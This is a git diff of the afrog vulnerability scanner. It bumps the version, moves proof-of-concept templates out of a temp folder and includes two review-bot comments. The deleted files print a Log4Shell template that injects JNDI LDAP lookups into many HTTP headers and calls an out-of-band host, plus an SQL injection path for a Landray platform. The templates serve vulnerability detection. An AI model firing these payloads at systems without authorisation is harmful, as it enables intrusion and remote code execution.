diff --git a/pkg/config/banner.go b/pkg/config/banner.go
index 802c6399..049487cd 100644
--- a/pkg/config/banner.go
+++ b/pkg/config/banner.go
@@ -9,7 +9,7 @@ import (
 "github.com/zan8in/gologger"
 )
-const Version = "3.0.1"
+const Version = "3.0.2"
 func InitBanner() {
 fmt.Printf("\r\n|\tA F 🐸 O G\t|")
diff --git a/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml b/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml
index cf8a3209..03e8c8d6 100644
--- a/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml
+++ b/pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml
@@ -1,4 +1,4 @@
-id: CVE-2021-44228
+id: CVE-2021-44228-temp
 info:
 name: Apache Log4j2 Remote Code Injection
@@ -18,6 +18,8 @@ info:
 created: 2023/07/02
 set:
+ rand1: randomInt(111,999)
+ rand2: randomInt(111,999)
 oob: oob()
 oobDNS: oob.DNS
 hostname: request.url.host
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-22320.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-22320.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/cve/CVE-2024-22320.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-22320.yaml
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-23334.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-23334.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/cve/CVE-2024-23334.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-23334.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/CVE-2024-25600.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-25600.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/CVE-2024-25600.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-25600.yaml
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-25735.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-25735.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/cve/CVE-2024-25735.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-25735.yaml
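Review bot: The new `id` in the `@@ -1,4 +1,4 @@` hunk of pocs/afrog-pocs/CVE/2021/CVE-2021-44228.yaml is `CVE-2021-44228-temp`, which no longer matches the file name and carries the suffix of the scratch copy. The new blob `03e8c8d6` is the same one the deleted `pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml` had, so the temp file appears to have replaced the published template verbatim without the id being restored; anything that selects or reports templates by id will now show the `-temp` name. Suggest `id: CVE-2021-44228`.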
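Review bot: The two `set:` entries added in the `@@ -18,6 +18,8 @@` hunk of the same file, `rand1: randomInt(111,999)` and `rand2: randomInt(111,999)`, are not referenced anywhere in the template: the full body is visible in the deleted temp copy (same blob `03e8c8d6`), and its `raw` request and both `expression` lines use only `hostname`, `oobDNS` and `oob`. Unused set variables read as an incomplete edit; either drop the two lines or add a comment such as `# rand1/rand2 reserved for <follow-up>` stating why they are kept.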
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-27198.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-27198.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/cve/CVE-2024-27198.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-27198.yaml
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2024-27199.yaml b/pocs/afrog-pocs/CVE/2024/CVE-2024-27199.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/cve/CVE-2024-27199.yaml
rename to pocs/afrog-pocs/CVE/2024/CVE-2024-27199.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml
rename to pocs/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce-temp.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml b/pocs/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml
rename to pocs/afrog-pocs/vulnerability/dahua-eims-capture-handle-rce.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml
rename to pocs/afrog-pocs/vulnerability/dahua-ipms-rce-temp.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml b/pocs/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml
rename to pocs/afrog-pocs/vulnerability/edusohu-classroom-course-statistics-fileread.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml b/pocs/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/esafenet-cdgserver3-policyajax-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml b/pocs/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/feiqi-parsetree-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml b/pocs/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml b/pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml
rename to pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-disclosure.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml b/pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml
rename to pocs/afrog-pocs/vulnerability/hongyun-tongtianxing-cms-v6-fileread.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml b/pocs/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml b/pocs/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/jinher-jc6-clobfield-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml b/pocs/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml
rename to pocs/afrog-pocs/vulnerability/jinher-uploadfileblock-fileupload.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml b/pocs/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/jiusi-oa-userlist3g-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml b/pocs/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml
rename to pocs/afrog-pocs/vulnerability/landray-syszonepersoninfo-disclosure.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml b/pocs/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml
rename to pocs/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml b/pocs/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml
rename to pocs/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml
rename to pocs/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce-temp.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml b/pocs/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml
rename to pocs/afrog-pocs/vulnerability/topsec-maincgi-rce.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml b/pocs/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml
rename to pocs/afrog-pocs/vulnerability/vmware-vcenter-log4j-jndi-rce-temp.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml b/pocs/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml
rename to pocs/afrog-pocs/vulnerability/wanhu-ezoffice-text2html-fileread.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml b/pocs/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml
rename to pocs/afrog-pocs/vulnerability/wanhu-oa-rhinoscript-engineservice-rce.yaml
diff --git a/pocs/temp/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml b/pocs/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml
similarity index 100%
rename from pocs/temp/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml
rename to pocs/afrog-pocs/vulnerability/yonyou-u9-patchfile-fileupload.yaml
diff --git a/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml b/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml
deleted file mode 100644
index 03e8c8d6..00000000
--- a/pocs/temp/afrog-pocs/cve/CVE-2021-44228-temp.yaml
+++ /dev/null
@@ -1,51 +0,0 @@
-id: CVE-2021-44228-temp
-
-info:
- name: Apache Log4j2 Remote Code Injection
- author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo,NLEG
- severity: critical
- verified: true
- description: |
- Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- reference:
- - https://logging.apache.org/log4j/2.x/security.html
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- - https://www.lunasec.io/docs/blog/log4j-zero-day/
- - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
- solutions: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
- tags: cve,cve2021,rce,oast,log4j,injection,kev
- created: 2023/07/02
-
-set:
- rand1: randomInt(111,999)
- rand2: randomInt(111,999)
- oob: oob()
- oobDNS: oob.DNS
- hostname: request.url.host
-rules:
- r0:
- request:
- raw: |- POST / HTTP/1.1
- Host: {{hostname}}
- Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://{{oobDNS}}}
- Accept-Encoding: ${jndi:ldap://{{oobDNS}}}
- Accept-Language: ${jndi:ldap://{{oobDNS}}}
- Access-Control-Request-Headers: ${jndi:ldap://{{oobDNS}}}
- Access-Control-Request-Method: ${jndi:ldap://{{oobDNS}}}
- Authentication: Basic ${jndi:ldap://{{oobDNS}}}
- Authentication: Bearer ${jndi:ldap://{{oobDNS}}}
- Cookie: ${jndi:ldap://{{oobDNS}}}
- Location: ${jndi:ldap://{{oobDNS}}}
- Origin: ${jndi:ldap://{{oobDNS}}}
- Referer: ${jndi:ldap://{{oobDNS}}}
- Upgrade-Insecure-Requests: ${jndi:ldap://{{oobDNS}}}
- User-Agent: ${jndi:ldap://{{oobDNS}}}
- X-Api-Version: ${jndi:ldap://{{oobDNS}}}
- X-CSRF-Token: ${jndi:ldap://{{oobDNS}}}
- X-Druid-Comment: ${jndi:ldap://{{oobDNS}}}
- X-Forwarded-For: ${jndi:ldap://{{oobDNS}}}
- X-Origin: ${jndi:ldap://{{oobDNS}}}
- expression: oobCheck(oob, oob.ProtocolDNS, 3)
-expression: r0()
diff --git a/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml b/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml
deleted file mode 100644
index a22d4870..00000000
--- a/pocs/temp/afrog-pocs/test/landray-eis-rpt-listreport-definefield-sqli.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: landray-eis-rpt-listreport-definefield-sqli
-
-info:
- name: 蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口SQL注入
- author: zan8in
- severity: high
- verified: false
- description: |- 蓝凌智慧协同平台eis集合了非常丰富的模块,满足组织企业在知识、协同、项目管理系统建设等需求。蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞
- fofa: icon_hash="953405444"||app="Landray-OA系统"
- tags: landray,eis,sqli
- created: 2024/03/05
-
-rules:
- r0:
- request:
- method: GET
- path: /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+
- expression: resposne.body.bcontains(b"Microsoft SQL Server")
-expression: r0()
diff --git a/pocs/temp/afrog-pocs/version b/pocs/temp/afrog-pocs/version
index 384effd6..657b2ccf 100644
--- a/pocs/temp/afrog-pocs/version
+++ b/pocs/temp/afrog-pocs/version
@@ -1 +1 @@
-0.3.35
\ No newline at end of file
+0.3.36
\ No newline at end of file
diff --git a/pocs/v/afrog-pocs.zip b/pocs/v/afrog-pocs.zip
index f1cd0c41..fd0cc609 100644
Binary files a/pocs/v/afrog-pocs.zip and b/pocs/v/afrog-pocs.zip differ
diff --git a/pocs/v/afrog.version b/pocs/v/afrog.version
index 13d683cc..d9c62ed9 100644
--- a/pocs/v/afrog.version
+++ b/pocs/v/afrog.version
@@ -1 +1 @@
-3.0.1
\ No newline at end of file
+3.0.2
\ No newline at end of file
diff --git a/pocs/v/version b/pocs/v/version
index 384effd6..657b2ccf 100644
--- a/pocs/v/version
+++ b/pocs/v/version
@@ -1 +1 @@
-0.3.35
\ No newline at end of file
+0.3.36
\ No newline at end of file